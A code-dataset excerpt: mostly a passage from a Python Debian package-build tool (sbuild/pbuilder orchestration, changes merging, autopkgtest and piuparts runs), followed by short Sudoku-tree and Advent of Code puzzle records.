{!r}'.format(self))\n\n product = dscs[0]\n\n with TemporaryDirectory(prefix='vectis-sbuild-') as tmp:\n copied_back = os.path.join(\n tmp, '{}.dsc'.format(self.buildable))\n worker.copy_to_host(product, copied_back)\n\n self.dsc = Dsc(open(copied_back))\n\n self.source_package = self.dsc['source']\n self.source_version = Version(\n self.dsc['version'])\n self.arch_wildcards = set(\n self.dsc['architecture'].split())\n self.binary_packages = [\n p.strip() for p in self.dsc['binary'].split(',')]\n\n worker.check_call([\n 'sh',\n '-euc',\n 'cd /var/lib/sbuild/build/\"$1\"/; shift; exec mv -- \"$@\"',\n 'sh',\n str(self),\n ] + [f['name'] for f in self.dsc['files']] + [\n worker.scratch + '/in/',\n ])\n\n def select_archs(\n self,\n *,\n worker_arch,\n archs,\n indep,\n indep_together,\n build_source,\n source_only,\n source_together):\n builds_i386 = False\n builds_natively = False\n need_source = (\n build_source or (\n build_source is None and\n self.dsc_name is None and\n not self.source_from_archive)\n )\n\n if source_only:\n if need_source:\n self.archs = ['source']\n else:\n logger.warning('Nothing to do')\n self.archs = []\n\n return\n\n for wildcard in self.arch_wildcards:\n if subprocess.call(\n ['dpkg-architecture', '-a' + worker_arch, '--is', wildcard]\n ) == 0:\n logger.info('Package builds natively on %s', worker_arch)\n builds_natively = True\n\n if subprocess.call(\n ['dpkg-architecture', '-ai386', '--is', wildcard]\n ) == 0:\n logger.info('Package builds on i386')\n builds_i386 = True\n\n if archs or indep:\n # the user is always right\n logger.info('Using architectures from command-line')\n self.archs = archs[:]\n else:\n logger.info('Choosing architectures to build')\n indep = ('all' in self.arch_wildcards)\n self.archs = []\n\n if builds_natively:\n self.archs.append(worker_arch)\n\n for line in subprocess.check_output(\n [\n 'sh', '-c', '\"$@\" || :',\n 'sh', # argv[0]\n 'dpkg-query', '-W',\n r'--showformat=${binary:Package}\\n',\n ] + list(self.binary_packages),\n universal_newlines=True).splitlines():\n if ':' in line:\n arch = line.split(':')[-1]\n if arch not in self.archs:\n logger.info(\n 'Building on %s because %s is installed',\n arch, line)\n self.archs.append(arch)\n\n if (worker_arch == 'amd64' and builds_i386 and\n not builds_natively and 'i386' not in self.archs):\n self.archs.append('i386')\n\n if 'all' not in self.arch_wildcards:\n indep = False\n\n if indep:\n if indep_together and self.archs:\n if worker_arch in self.archs:\n self.indep_together_with = worker_arch\n else:\n self.indep_together_with = self.archs[0]\n else:\n self.archs.append('all')\n\n if need_source:\n if source_together and self.archs:\n self.source_together_with = self.archs[0]\n else:\n self.archs[:0] = ['source']\n\n logger.info('Selected architectures: %r', self.archs)\n\n if need_source and self.source_together_with is not None:\n logger.info(\n 'Clean source package will be built alongside %s',\n self.source_together_with)\n\n if indep and self.indep_together_with is not None:\n logger.info(\n 'Architecture-independent packages will be built alongside %s',\n self.indep_together_with)\n\n def select_suite(self, factory, override):\n suite_name = override\n\n if suite_name is None:\n suite_name = self.nominal_suite\n\n if suite_name is None:\n raise ArgumentError(\n 'Must specify --suite when building from {!r}'.format(\n self.buildable))\n\n if isinstance(suite_name, Suite):\n self.suite = suite_name\n else:\n if suite_name == 'UNRELEASED':\n logger.info(\n 'Replacing UNRELEASED with %s', self.vendor.default_suite)\n suite_name = self.vendor.default_suite\n\n if suite_name.endswith('-UNRELEASED'):\n suite_name = suite_name[:-len('-UNRELEASED')]\n logger.info(\n 'Replacing %s-UNRELEASED with %s', suite_name, suite_name)\n\n self.suite = factory.get_suite(self.vendor, suite_name)\n\n if self.nominal_suite is None:\n self.nominal_suite = str(self.suite)\n\n def __str__(self):\n return self.buildable\n\n def get_debs(self, architecture):\n ret = set()\n\n for k, v in self.merged_changes.items():\n changes = Changes(open(v))\n\n for f in changes['files']:\n if (f['name'].endswith('_{}.deb'.format(architecture)) or\n f['name'].endswith('_all.deb')):\n assert '/' not in f['name']\n ret.add(\n os.path.join(\n os.path.dirname(v) or os.curdir,\n f['name'],\n ),\n )\n\n return sorted(ret)\n\n def check_build_product(self, base):\n \"\"\"\n Check whether base is a safe filename to copy back to the host.\n If we don't trust the build system, we don't want to create symbolic\n links with arbitrary names under its control.\n \"\"\"\n\n if os.path.basename(base) != base:\n raise ArgumentError('Contains a path separator')\n\n if base.startswith('.'):\n raise ArgumentError('Is a hidden file')\n\n if base.endswith(('.deb', '.udeb')):\n return\n\n if not base.startswith(self.source_package + '_'):\n raise ArgumentError('Unexpected prefix')\n\n if base.endswith(('.changes', '.dsc', '.buildinfo', '.diff.gz')):\n return\n\n if base.startswith(self.source_package + '_') and '.tar.' in base:\n return\n\n raise ArgumentError('Unexpected filename')\n\n def merge_changes(self):\n if self.sourceful_changes_name:\n base = '{}_source.changes'.format(self.product_prefix)\n c = os.path.join(self.output_dir, base)\n c = os.path.abspath(c)\n if 'source' not in self.changes_produced:\n with AtomicWriter(c) as writer:\n subprocess.check_call([\n 'mergechanges',\n '--source',\n self.sourceful_changes_name,\n self.sourceful_changes_name,\n ], stdout=writer)\n\n self.merged_changes['source'] = c\n\n if ('all' in self.changes_produced and\n 'source' in self.merged_changes):\n base = '{}_source+all.changes'.format(self.product_prefix)\n c = os.path.join(self.output_dir, base)\n c = os.path.abspath(c)\n self.merged_changes['source+all'] = c\n with AtomicWriter(c) as writer:\n subprocess.check_call([\n 'mergechanges',\n self.changes_produced['all'],\n self.merged_changes['source'],\n ], stdout=writer)\n\n binary_group = 'binary'\n\n binary_changes = []\n for k, v in self.changes_produced.items():\n if k != 'source':\n binary_changes.append(v)\n\n if v == self.sourceful_changes_name:\n binary_group = 'source+binary'\n\n base = '{}_{}.changes'.format(\n self.product_prefix, binary_group)\n c = os.path.join(self.output_dir, base)\n c = os.path.abspath(c)\n\n if len(binary_changes) > 1:\n with AtomicWriter(c) as writer:\n subprocess.check_call(\n ['mergechanges'] + binary_changes, stdout=writer)\n self.merged_changes[binary_group] = c\n elif len(binary_changes) == 1:\n shutil.copy(binary_changes[0], c)\n self.merged_changes[binary_group] = c\n # else it was source-only: no binary changes\n\n if ('source' in self.merged_changes and\n 'binary' in self.merged_changes):\n base = '{}_source+binary.changes'.format(self.product_prefix)\n c = os.path.join(self.output_dir, base)\n c = os.path.abspath(c)\n self.merged_changes['source+binary'] = c\n\n with AtomicWriter(c) as writer:\n subprocess.check_call([\n 'mergechanges',\n self.merged_changes['source'],\n self.merged_changes['binary'],\n ], stdout=writer)\n\n for ident, linkable in (\n list(self.merged_changes.items()) +\n list(self.changes_produced.items())):\n base = os.path.basename(linkable)\n\n for l in self.link_builds:\n symlink = os.path.join(l, base)\n\n with suppress(FileNotFoundError):\n os.unlink(symlink)\n\n os.symlink(linkable, symlink)\n\n\nclass Build:\n\n def __init__(\n self,\n buildable,\n arch,\n worker,\n *,\n mirrors,\n profiles,\n storage,\n deb_build_options=(),\n dpkg_buildpackage_options=(),\n dpkg_source_options=(),\n environ=None,\n components=(),\n extra_repositories=()):\n self.arch = arch\n self.buildable = buildable\n self.components = components\n self.dpkg_buildpackage_options = dpkg_buildpackage_options\n self.dpkg_source_options = dpkg_source_options\n self.environ = {}\n self.extra_repositories = extra_repositories\n assert not isinstance(profiles, str), profiles\n self.mirrors = mirrors\n self.profiles = set(profiles)\n self.storage = storage\n self.worker = worker\n\n if environ is not None:\n for k, v in environ.items():\n self.environ[k] = v\n\n self.environ['DEB_BUILD_OPTIONS'] = ' '.join(deb_build_options)\n\n def sbuild(self, *, sbuild_options=()):\n self.worker.check_call([\n 'install', '-d', '-m755', '-osbuild', '-gsbuild',\n '{}/out'.format(self.worker.scratch)])\n\n logger.info('Building architecture: %s', self.arch)\n\n if self.arch in ('all', 'source'):\n logger.info('(on %s)', self.worker.dpkg_architecture)\n use_arch = self.worker.dpkg_architecture\n else:\n use_arch = self.arch\n\n with SchrootWorker(\n storage=self.storage,\n architecture=use_arch,\n chroot='{}-{}-sbuild'.format(self.buildable.suite, use_arch),\n components=self.components,\n extra_repositories=self.extra_repositories,\n mirrors=self.mirrors,\n suite=self.buildable.suite,\n worker=self.worker,\n ) as chroot:\n self._sbuild(chroot, sbuild_options)\n\n def _sbuild(self, chroot, sbuild_options=()):\n sbuild_version = self.worker.dpkg_version('sbuild')\n\n argv = [\n self.worker.command_wrapper,\n '--chdir',\n '{}/out'.format(self.worker.scratch),\n '--',\n 'runuser',\n '-u', 'sbuild',\n '--',\n 'env',\n ]\n\n for k, v in sorted(self.environ.items()):\n argv.append('{}={}'.format(k, v))\n\n argv.extend((\n 'sbuild',\n '-c', chroot.chroot,\n '-d', str(self.buildable.nominal_suite),\n '--no-run-lintian',\n ))\n\n if self.profiles:\n argv.append('--profiles={}'.format(','.join(self.profiles)))\n\n for x in self.dpkg_buildpackage_options:\n argv.append('--debbuildopt=' + x)\n\n for child in chroot.suite.hierarchy[:-1]:\n # The schroot already has the apt sources, we just need the\n # resolver\n if child.sbuild_resolver:\n argv.extend(child.sbuild_resolver)\n break\n\n if self.arch == 'all':\n logger.info('Architecture: all')\n argv.append('-A')\n\n # Backwards compatibility goo for Debian jessie buildd backport\n # and for sbuild in Ubuntu xenial\n if sbuild_version < Version('0.69.0'):\n argv.append('--arch-all-only')\n else:\n argv.append('--no-arch-any')\n elif self.arch == self.buildable.indep_together_with:\n logger.info('Architecture: %s + all', self.arch)\n argv.append('-A')\n argv.append('--arch')\n argv.append(self.arch)\n elif self.arch == 'source':\n logger.info('Source-only')\n argv.append('--no-arch-any')\n\n if sbuild_version < Version('0.69.0'):\n # Backwards compatibility for Debian jessie buildd backport,\n # and for sbuild in Ubuntu xenial.\n\n # sbuild < 0.69.0 expects to find foo_1_amd64.changes\n # even for a source-only build (because it doesn't really\n # support source-only builds), so we have to cheat.\n perl = (\n \"'\" +\n '$arch = qx(dpkg\\\\x20--print-architecture);\\n' +\n 'chomp($arch);\\n' +\n 'chdir(shift);\\n' +\n 'foreach(glob(\"../*_source.changes\")) {\\n' +\n ' $orig = $_;\\n' +\n ' s/_source\\\\.changes$/_${arch}.changes/;\\n' +\n ' print(\"Renaming\\\\x20$orig\\\\x20to\\\\x20$_\\\\n\");\\n' +\n ' rename($orig,$_) || die(\"$!\");\\n' +\n '}\\n' +\n \"'\")\n\n argv.append(\n '--finished-build-commands=perl -e {} %p'.format(perl))\n\n else:\n logger.info('Architecture: %s only', self.arch)\n argv.append('--arch')\n argv.append(self.arch)\n\n if self.arch in ('source', self.buildable.source_together_with):\n # Build a clean source package as a side-effect of one\n # build.\n argv.append('--source')\n\n for x in self.dpkg_source_options:\n argv.append('--debbuildopt=--source-option={}'.format(x))\n\n if self.buildable.binary_version_suffix:\n argv.append('--append-to-version={}'.format(\n self.buildable.binary_version_suffix))\n\n for x in sbuild_options:\n argv.append(x)\n\n if self.buildable.dsc_name is not None:\n if 'source' in self.buildable.changes_produced:\n # We rebuilt the source already. Use the rebuilt version\n # for all subsequent builds.\n argv.append('{}/out/{}'.format(\n self.worker.scratch,\n os.path.basename(self.buildable.dsc_name)))\n else:\n # We got a .dsc from outside Vectis and are not\n # rebuilding it.\n argv.append('{}/in/{}'.format(\n self.worker.scratch,\n os.path.basename(self.buildable.dsc_name)))\n elif self.buildable.source_from_archive:\n argv.append(self.buildable.buildable)\n else:\n # jessie sbuild doesn't support --no-clean-source so build\n # the temporary source package ourselves.\n ds_argv = [\n self.worker.command_wrapper,\n '--chdir',\n '{}/in/{}_source'.format(\n self.worker.scratch, self.buildable.product_prefix),\n '--',\n 'dpkg-source',\n ]\n\n for x in self.dpkg_source_options:\n ds_argv.append(x)\n\n ds_argv.extend(('-b', '.'))\n self.worker.check_call(ds_argv)\n argv.append('{}/in/{}.dsc'.format(\n self.worker.scratch, self.buildable.product_prefix))\n\n logger.info('Running %r', argv)\n try:\n self.worker.check_call(argv)\n finally:\n # Note that we mix chroot.dpkg_architecture and arch here: an\n # Architecture: all build produces foo_1.2_amd64.build, which we\n # rename.\n # We also check for foo_amd64.build because\n # that's what comes out if we do \"vectis sbuild --suite=sid hello\".\n for prefix in (self.buildable.source_package,\n self.buildable.product_prefix):\n product = '{}/out/{}_{}.build'.format(\n self.worker.scratch, prefix, chroot.dpkg_architecture)\n product = self.worker.check_output(\n ['readlink', '-f', product],\n universal_newlines=True).rstrip('\\n')\n\n if self.worker.call(['test', '-e', product]) == 0:\n logger.info(\n 'Copying %s back to host as %s_%s.build...',\n product, self.buildable.product_prefix, self.arch)\n copied_back = os.path.join(\n self.buildable.output_dir,\n '{}_{}_{}.build'.format(\n self.buildable.product_prefix, self.arch,\n time.strftime('%Y%m%dt%H%M%S', time.gmtime())))\n self.worker.copy_to_host(product, copied_back)\n self.buildable.logs[self.arch] = copied_back\n\n symlink = os.path.join(\n self.buildable.output_dir,\n '{}_{}.build'.format(\n self.buildable.product_prefix, self.arch))\n try:\n os.remove(symlink)\n except FileNotFoundError:\n pass\n\n os.symlink(os.path.abspath(copied_back), symlink)\n break\n else:\n logger.warning('Did not find build log at %s', product)\n logger.warning(\n 'Possible build logs:\\n%s',\n self.worker.check_call([\n 'sh', '-c',\n 'cd \"$1\"; ls -l *.build || :',\n 'sh', # argv[0]\n self.worker.scratch]))\n\n if self.arch == 'source':\n # Make sure the orig.tar.* are in the out directory, because\n # we will be building from the rebuilt source in future\n self.worker.check_call([\n 'sh', '-c',\n 'ln -nsf \"$1\"/in/*.orig.tar.* \"$1\"/out/',\n 'sh', # argv[0]\n self.worker.scratch])\n\n product_arch = None\n\n for candidate in (self.arch, self.worker.dpkg_architecture):\n product = '{}/out/{}_{}.changes'.format(\n self.worker.scratch, self.buildable.product_prefix,\n candidate)\n if self.worker.call(['test', '-e', product]) == 0:\n product_arch = candidate\n break\n else:\n raise CannotHappen(\n 'sbuild produced no .changes file from {!r}'.format(\n self.buildable))\n\n copied_back = self.copy_back_product(\n '{}_{}.changes'.format(\n self.buildable.product_prefix,\n product_arch),\n '{}_{}.changes'.format(\n self.buildable.product_prefix,\n self.arch))\n\n if copied_back is not None:\n self.buildable.changes_produced[self.arch] = copied_back\n\n changes_out = Changes(open(copied_back))\n\n if 'source' in changes_out['architecture'].split():\n self.buildable.dsc_name = None\n self.buildable.sourceful_changes_name = copied_back\n\n for f in changes_out['files']:\n if f['name'].endswith('.dsc'):\n # expect to find exactly one .dsc file\n assert self.buildable.dsc_name is None\n self.buildable.dsc_name = os.path.join(\n self.buildable.output_dir, f['name'])\n\n assert self.buildable.dsc_name is not None\n # Save some space\n self.worker.check_call(['rm', '-fr', '{}/in/{}_source/'.format(\n self.worker.scratch,\n self.buildable.product_prefix)])\n\n dsc = None\n\n for f in changes_out['files']:\n copied_back = self.copy_back_product(f['name'])\n\n if copied_back is not None and f['name'].endswith('.dsc'):\n dsc = Dsc(open(copied_back))\n\n if dsc is not None:\n if self.buildable.dsc is None:\n self.buildable.dsc = dsc\n\n for f in dsc['files']:\n # The orig.tar.* might not have come back. Copy that too,\n # if necessary.\n self.copy_back_product(f['name'], skip_if_exists=True)\n\n def pbuilder(self, *, sbuild_options=()):\n self.worker.check_call([\n 'install', '-d', '-m755',\n '{}/out'.format(self.worker.scratch)])\n\n logger.info('Building architecture: %s', self.arch)\n\n if self.arch in ('all', 'source'):\n logger.info('(on %s)', self.worker.dpkg_architecture)\n use_arch = self.worker.dpkg_architecture\n else:\n use_arch = self.arch\n\n with PbuilderWorker(\n storage=self.storage,\n architecture=use_arch,\n components=self.components,\n extra_repositories=self.extra_repositories,\n mirrors=self.mirrors,\n suite=self.buildable.suite,\n worker=self.worker,\n ) as worker:\n self._pbuilder(worker)\n\n def _pbuilder(self, worker):\n argv = [\n self.worker.command_wrapper,\n '--chdir',\n '{}/out'.format(self.worker.scratch),\n '--',\n 'env',\n ]\n\n if self.buildable.binary_version_suffix:\n raise ArgumentError(\n 'pbuilder does not support an arbitrary binary version '\n 'suffix')\n\n for k, v in sorted(self.environ.items()):\n argv.append('{}={}'.format(k, v))\n\n argv.extend((\n 'pbuilder',\n 'build',\n ))\n\n argv.extend(worker.apt_related_argv)\n\n if self.profiles:\n argv.append('--profiles')\n argv.append(','.join(self.profiles))\n\n opts = []\n\n for x in self.dpkg_buildpackage_options:\n opts.append(shlex.quote(x))\n\n argv.append('--debbuildopts')\n argv.append(' '.join(opts))\n\n # This must come after debbuildopts\n if self.arch == 'all':\n logger.info('Architecture: all')\n argv.append('--binary-indep')\n elif self.arch == self.buildable.indep_together_with:\n logger.info('Architecture: %s + all', self.arch)\n argv.append('--architecture')\n argv.append(self.arch)\n else:\n logger.info('Architecture: %s only', self.arch)\n argv.append('--binary-arch')\n argv.append('--architecture')\n argv.append(self.arch)\n\n argv.append('--basetgz')\n argv.append('{}'.format(worker.tarball_in_guest))\n argv.append('--buildresult')\n argv.append('{}/out'.format(self.worker.scratch))\n argv.append('--aptcache')\n argv.append('')\n argv.append('--logfile')\n argv.append('{}/out/{}_{}.build'.format(\n self.worker.scratch,\n self.buildable.product_prefix,\n worker.dpkg_architecture,\n ))\n\n # TODO: --host-arch, --no-auto-cross?\n # TODO: --http-proxy\n\n argv.append('{}/in/{}'.format(\n self.worker.scratch,\n os.path.basename(self.buildable.dsc_name)))\n\n logger.info('Running %r', argv)\n try:\n self.worker.check_call(argv)\n finally:\n product = '{}/out/{}_{}.build'.format(\n self.worker.scratch, self.buildable.product_prefix,\n worker.dpkg_architecture)\n product = self.worker.check_output(\n ['readlink', '-f', product],\n universal_newlines=True).rstrip('\\n')\n\n if self.worker.call(['test', '-e', product]) == 0:\n logger.info('Copying %s back to host as %s_%s.build...',\n product, self.buildable.product_prefix, self.arch)\n copied_back = os.path.join(\n self.buildable.output_dir,\n '{}_{}_{}.build'.format(\n self.buildable.product_prefix, self.arch,\n time.strftime('%Y%m%dt%H%M%S', time.gmtime())))\n self.worker.copy_to_host(product, copied_back)\n self.buildable.logs[self.arch] = copied_back\n\n symlink = os.path.join(\n self.buildable.output_dir,\n '{}_{}.build'.format(\n self.buildable.product_prefix, self.arch))\n try:\n os.remove(symlink)\n except FileNotFoundError:\n pass\n\n os.symlink(os.path.abspath(copied_back), symlink)\n\n product_arch = None\n\n for candidate in (self.arch, self.worker.dpkg_architecture):\n product = '{}/out/{}_{}.changes'.format(\n self.worker.scratch, self.buildable.product_prefix,\n candidate)\n if self.worker.call(['test', '-e', product]) == 0:\n product_arch = candidate\n break\n else:\n raise CannotHappen(\n 'pbuilder produced no .changes file from {!r}'.format(\n self.buildable))\n\n copied_back = self.copy_back_product(\n '{}_{}.changes'.format(\n self.buildable.product_prefix,\n product_arch),\n '{}_{}.changes'.format(\n self.buildable.product_prefix,\n self.arch))\n\n if copied_back is not None:\n self.buildable.changes_produced[self.arch] = copied_back\n\n changes_out = Changes(open(copied_back))\n dsc = None\n\n for f in changes_out['files']:\n copied_back = self.copy_back_product(f['name'])\n\n if copied_back is not None and f['name'].endswith('.dsc'):\n dsc = Dsc(open(copied_back))\n\n if dsc is not None:\n if self.buildable.dsc is None:\n self.buildable.dsc = dsc\n\n for f in dsc['files']:\n # The orig.tar.* might not have come back. Copy that too,\n # if necessary.\n self.copy_back_product(f['name'], skip_if_exists=True)\n\n def copy_back_product(self, base, to_base=None, *, skip_if_exists=False):\n if to_base is None:\n to_base = base\n\n try:\n self.buildable.check_build_product(base)\n except ArgumentError as e:\n logger.warning('Unexpected build product %r: %s', base, e)\n return None\n else:\n product = '{}/out/{}'.format(self.worker.scratch, base)\n copied_back = os.path.join(self.buildable.output_dir, to_base)\n copied_back = os.path.abspath(copied_back)\n\n if skip_if_exists and os.path.exists(copied_back):\n return copied_back\n\n if to_base != base:\n logger.info(\n 'Additionally copying %s back to host as %s...',\n base, to_base)\n else:\n logger.info('Additionally copying %s back to host...', base)\n\n if not skip_if_exists:\n with suppress(FileNotFoundError):\n os.unlink(copied_back)\n\n self.worker.copy_to_host(product, copied_back)\n\n for l in self.buildable.link_builds:\n symlink = os.path.join(l, to_base)\n\n with suppress(FileNotFoundError):\n os.unlink(symlink)\n\n os.symlink(copied_back, symlink)\n\n return copied_back\n\n\nclass BuildGroup:\n def __init__(\n self,\n *,\n binary_version_suffix='', # type: str\n buildables=(), # type: Iterable[str]\n components=(), # type: Iterable[str]\n deb_build_options=(), # type: Iterable[str]\n dpkg_buildpackage_options=(), # type: Iterable[str]\n dpkg_source_options=(), # type: Iterable[str]\n extra_repositories=(), # type: Iterable[str]\n link_builds, # type: Iterable[str]\n orig_dirs=(), # type: Iterable[str]\n output_dir, # type: Optional[str]\n output_parent, # type: str\n mirrors, # type: vectis.config.Mirrors\n profiles=(), # type: Iterable[str]\n sbuild_options=(), # type: Iterable[str]\n storage, # type: str\n suite=None, # type: Optional[str]\n vendor, # type: vectis.config.Vendor\n ):\n # type: (...) -> None\n\n self.components = components\n self.deb_build_options = deb_build_options\n self.dpkg_buildpackage_options = dpkg_buildpackage_options\n self.dpkg_source_options = dpkg_source_options\n self.extra_repositories = extra_repositories\n self.link_builds = link_builds\n self.orig_dirs = orig_dirs\n self.output_dir = output_dir\n self.output_parent = output_parent\n self.mirrors = mirrors\n self.profiles = profiles\n self.sbuild_options = sbuild_options\n self.storage = storage\n self.suite = suite\n self.vendor = vendor\n\n self.buildables = [] # type: List[Buildable]\n\n for a in (buildables or ['.']):\n buildable = Buildable(\n a,\n binary_version_suffix=binary_version_suffix,\n link_builds=link_builds,\n orig_dirs=orig_dirs,\n output_dir=output_dir,\n output_parent=output_parent,\n vendor=vendor)\n self.buildables.append(buildable)\n\n self.workers = [] # type: List[Tuple[List[str], str, VirtWorker]]\n\n def select_suites(self, factory):\n for b in self.buildables:\n b.select_suite(factory, self.suite)\n\n def get_worker(\n self,\n argv, # type: List[str]\n suite, # type: str\n ):\n for triple in self.workers:\n a, s, w = triple\n\n if argv == a and suite == s:\n return w\n else:\n w = VirtWorker(\n argv,\n mirrors=self.mirrors,\n storage=self.storage,\n suite=suite,\n )\n self.workers.append((argv, suite, w))\n return w\n\n def new_build(\n self,\n buildable: Buildable,\n arch: str,\n worker: VirtWorker,\n ):\n return Build(\n buildable,\n arch,\n worker,\n components=self.components,\n deb_build_options=self.deb_build_options,\n dpkg_buildpackage_options=self.dpkg_buildpackage_options,\n dpkg_source_options=self.dpkg_source_options,\n extra_repositories=self.extra_repositories,\n mirrors=self.mirrors,\n profiles=self.profiles,\n storage=self.storage,\n )\n\n def get_source(\n self,\n buildable: Buildable,\n worker: VirtWorker,\n ):\n use_arch = worker.dpkg_architecture\n\n if buildable.source_from_archive:\n with SchrootWorker(\n storage=self.storage,\n architecture=use_arch,\n chroot='{}-{}-sbuild'.format(buildable.suite, use_arch),\n components=self.components,\n extra_repositories=self.extra_repositories,\n mirrors=self.mirrors,\n suite=buildable.suite,\n worker=worker,\n ) as chroot:\n buildable.get_source_from_archive(worker, chroot)\n else:\n buildable.copy_source_to(worker)\n\n def sbuild(\n self,\n worker, # type: VirtWorker\n *,\n archs=(), # type: Iterable[str]\n build_source=None, # type: Optional[bool] # None -> auto\n indep=False,\n indep_together=False,\n source_only=False,\n source_together=False,\n ):\n with worker:\n self._sbuild(worker)\n\n def _sbuild(\n self,\n worker, # type: VirtWorker\n *,\n archs=(), # type: Iterable[str]\n build_source=None, # type: Optional[bool] # None -> auto\n indep=False,\n indep_together=False,\n source_only=False,\n source_together=False,\n ):\n\n logger.info('Installing sbuild')\n worker.check_call([\n 'env',\n 'DEBIAN_FRONTEND=noninteractive',\n 'apt-get',\n '-y',\n '-t', worker.suite.apt_suite,\n '--no-install-recommends',\n 'install',\n\n 'python3',\n 'sbuild',\n 'schroot',\n ])\n # Be like the real Debian build infrastructure: give sbuild a\n # nonexistent home directory.\n worker.check_call([\n 'usermod',\n '-d', '/nonexistent',\n 'sbuild',\n ])\n\n for buildable in self.buildables:\n logger.info('Processing: %s', buildable)\n self.get_source(buildable, worker)\n buildable.select_archs(\n worker_arch=worker.dpkg_architecture,\n archs=archs,\n indep=indep,\n indep_together=indep_together,\n build_source=build_source,\n source_only=source_only,\n source_together=source_together,\n )\n\n logger.info('Builds required: %r', list(buildable.archs))\n\n for arch in buildable.archs:\n self.new_build(buildable, arch, worker).sbuild(\n sbuild_options=self.sbuild_options)\n\n buildable.merge_changes()\n\n def pbuilder(\n self,\n worker, # type: VirtWorker\n *,\n archs=(), # type: Iterable[str]\n indep=False,\n indep_together=False,\n ):\n with worker:\n self._pbuilder(worker)\n\n def _pbuilder(\n self,\n worker, # type: VirtWorker\n *,\n archs=(), # type: Iterable[str]\n indep=False,\n indep_together=True,\n ):\n for buildable in self.buildables:\n if buildable.source_from_archive:\n raise ArgumentError(\n 'pbuilder can only build a .dsc file')\n\n logger.info('Installing pbuilder')\n worker.check_call([\n 'env',\n 'DEBIAN_FRONTEND=noninteractive',\n 'apt-get',\n '-y',\n '-t', worker.suite.apt_suite,\n '--no-install-recommends',\n 'install',\n\n 'eatmydata',\n 'fakeroot',\n 'net-tools',\n 'pbuilder',\n 'python3',\n ])\n\n for buildable in self.buildables:\n logger.info('Processing: %s', buildable)\n self.get_source(buildable, worker)\n buildable.select_archs(\n worker_arch=worker.dpkg_architecture,\n archs=archs,\n indep=indep,\n indep_together=indep_together,\n build_source=False,\n source_only=False,\n source_together=True,\n )\n\n logger.info('Builds required: %r', list(buildable.archs))\n\n for arch in buildable.archs:\n self.new_build(buildable, arch, worker).pbuilder()\n\n buildable.merge_changes()\n\n def autopkgtest(\n self,\n *,\n default_architecture, # type: str\n lxc_24bit_subnet, # type: str\n lxc_worker, # type: List[str]\n lxd_worker, # type: List[str]\n modes=(), # type: Iterable[str]\n qemu_ram_size, # type: int\n schroot_worker, # type: List[str]\n worker, # type: List[str]\n ):\n for buildable in self.buildables:\n try:\n source_dsc = None\n source_package = None\n\n if buildable.dsc_name is not None:\n source_dsc = buildable.dsc_name\n logger.info('Testing source changes file %s', source_dsc)\n elif buildable.source_from_archive:\n source_package = buildable.source_package\n logger.info('Testing source package %s', source_package)\n else:\n logger.warning(\n 'Unable to run autopkgtest on %s', buildable.buildable)\n continue\n\n if (buildable.dsc is not None and\n 'testsuite' not in buildable.dsc):\n logger.info('No autopkgtests available')\n continue\n\n test_architectures = []\n\n for arch in buildable.archs:\n if arch != 'all' and arch != 'source':\n test_architectures.append(arch)\n\n if 'all' in buildable.archs and not test_architectures:\n test_architectures.append(default_architecture)\n\n logger.info('Testing on architectures: %r', test_architectures)\n\n for architecture in test_architectures:\n buildable.autopkgtest_failures.extend(\n run_autopkgtest(\n architecture=architecture,\n binaries=buildable.get_debs(architecture),\n components=self.components,\n extra_repositories=self.extra_repositories,\n lxc_24bit_subnet=lxc_24bit_subnet,\n lxc_worker=lxc_worker,\n lxd_worker=lxd_worker,\n mirrors=self.mirrors,\n modes=modes,\n output_logs=buildable.output_dir,\n qemu_ram_size=qemu_ram_size,\n schroot_worker=schroot_worker,\n source_dsc=source_dsc,\n source_package=source_package,\n storage=self.storage,\n suite=buildable.suite,\n vendor=self.vendor,\n worker=worker,\n ),\n )\n except KeyboardInterrupt:\n buildable.autopkgtest_failures.append('interrupted')\n raise\n\n def piuparts(\n self,\n *,\n default_architecture, # type: str\n tarballs, # type: Iterable[str]\n worker, # type: VirtWorker\n ):\n for buildable in self.buildables:\n try:\n test_architectures = []\n\n for arch in buildable.archs:\n if arch != 'all' and arch != 'source':\n test_architectures.append(arch)\n\n if 'all' in buildable.archs and not test_architectures:\n test_architectures.append(default_architecture)\n\n logger.info(\n 'Running piuparts on architectures: %r',\n test_architectures)\n\n for architecture in test_architectures:\n buildable.piuparts_failures.extend(\n run_piuparts(\n architecture=architecture,\n binaries=(\n Binary(b, deb=b)\n for b in buildable.get_debs(architecture)),\n components=self.components,\n extra_repositories=self.extra_repositories,\n mirrors=self.mirrors,\n output_logs=buildable.output_dir,\n storage=self.storage,\n suite=buildable.suite,\n tarballs=tarballs,\n vendor=self.vendor,\n worker=worker,\n ),\n )\n except KeyboardInterrupt:\n buildable.piuparts_failures.append('interrupted')\n raise\n","repo_name":"smcv/vectis","sub_path":"vectis/debuild.py","file_name":"debuild.py","file_ext":"py","file_size_in_byte":60501,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"21553419149","text":"'''\nCreated on 24. tra 2017.\n\n@author: Annie\n'''\n\nimport copy\n\nfrom sudoku_solver import SudokuSolver\n\nclass SudokuTree(object):\n\n def __init__(self, tile, digit, sudoku_board, children=None):\n self.solver = SudokuSolver()\n self.solver.sudoku_board = copy.deepcopy(sudoku_board)\n self.tile = tile\n self.digit = digit\n self.children = []\n if children is not None:\n for child in children:\n self.add_child(child)\n\n def add_child(self, node):\n assert isinstance(node, SudokuTree)\n self.children.append(node)\n\n","repo_name":"anniekovac/sudoku_solver","sub_path":"tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4511298063","text":"with open(\"input\") as f:\n row = f.read().strip()\n\n\ndef grow(row):\n new_row = ''\n for i in range(len(row)):\n if i == 0:\n pos = '.' + row[:2]\n elif i == len(row) - 1:\n pos = row[-2:] + '.'\n else:\n pos = row[i - 1: i + 2]\n if pos in {'^^.', '.^^', '^..', '..^'}:\n new_row += '^'\n else:\n new_row += '.'\n return new_row\n\n\ndef solve(row, n_rows):\n count = row.count('.')\n for _ in range(n_rows):\n row = grow(row)\n count += row.count('.')\n return count\n\n# part I\nprint(solve(row, 39))\n\n# part II\nprint(solve(row, 399999))\n","repo_name":"madsthoisen/advent_of_code","sub_path":"2016/dec18/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73535251689","text":"# -*- coding: utf-8 -*-\n\"\"\"## 